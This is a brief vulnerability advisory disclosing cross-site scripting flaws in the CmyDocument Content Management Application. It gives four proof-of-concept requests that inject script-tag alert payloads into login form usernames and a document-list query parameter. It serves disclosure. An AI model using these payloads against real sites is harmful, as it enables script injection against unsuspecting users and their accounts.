CmyDocument Content Management Application XSS Vulnerabilities

Summary

CmyDocument Content Management Application is prone to a Cross-Site Scripting Vulnerability.

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * CmyDocument Content Management Application version update: 2010-01-10

Proof Of Concept :
1)username in login.asp,PoC:
POST http://192.168.10.202/login.asp
————————————
username=’><script>alert(‘demonalex’)</script>&password=bbb&rememberme=a&submit=+++Login+++

2)username in login2.asp,PoC:
POST http://192.168.10.202/login2.asp
————————————
username=’><script>alert(‘demonalex’)</script>&password=bbb&rememberme=a&submit=+++Login+++

3)x_Revised in myDoclist.asp,PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert(‘demonalex’);</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4)x_Revised in myWebDoclist.asp,PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert(‘demonalex’);</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

Disclosure Timeline:
Vulnerability Published : 2011-07-11

Categories: News